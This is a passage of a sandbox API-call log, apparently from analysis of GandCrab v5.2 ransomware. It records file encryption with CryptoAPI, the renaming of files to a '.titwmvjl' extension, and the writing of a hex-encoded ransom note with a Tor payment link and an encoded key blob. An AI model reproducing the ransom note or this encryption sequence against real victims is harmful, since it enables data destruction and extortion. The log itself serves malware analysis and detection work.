dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.551] GetLastError () returned 0x0 [0095.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.551] CryptDestroyKey (hKey=0x503478) returned 1 [0095.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.551] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.551] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.551] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0095.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.552] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034f8) returned 1 [0095.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.552] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0095.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.552] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0095.552] GetLastError () returned 0x0 [0095.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.552] CryptDestroyKey (hKey=0x5034f8) returned 1 [0095.552] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0095.553] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0095.553] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0095.553] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0095.553] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x1529c, lpOverlapped=0x0) returned 1 [0095.608] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffead64, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.608] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1529c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x1529c, lpOverlapped=0x0) returned 1 [0095.610] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.610] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0095.611] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.614] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.615] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.615] CloseHandle (hObject=0x2c4) returned 1 [0095.616] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\e1gfb.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\e1GFB.mkv.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\e1gfb.mkv.titwmvjl"), dwFlags=0x1) returned 1 [0095.616] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.616] FindNextFileW (in: hFindFile=0x503278, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0095.616] lstrcmpW (lpString1="pFJx7JDxO1-0GIQE", lpString2=".") returned 1 [0095.616] lstrcmpW (lpString1="pFJx7JDxO1-0GIQE", lpString2="..") returned 1 [0095.616] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\", lpString2="pFJx7JDxO1-0GIQE" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE" [0095.616] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\" [0095.616] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0095.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.617] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0095.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.617] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0095.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.617] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0095.617] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0095.617] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0095.617] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.618] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0095.618] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\\\TITWMVJL-DECRYPT.txt") returned 116 [0095.618] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\XszTLjK GHoiKt1rd\\ffP1p0bC-Op3oB\\LKAlvv468QzU1uc\\pFJx7JDxO1-0GIQE\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\xsztljk ghoikt1rd\\ffp1p0bc-op3ob\\lkalvv468qzu1uc\\pfjx7jdxo1-0giqe\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0095.619] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\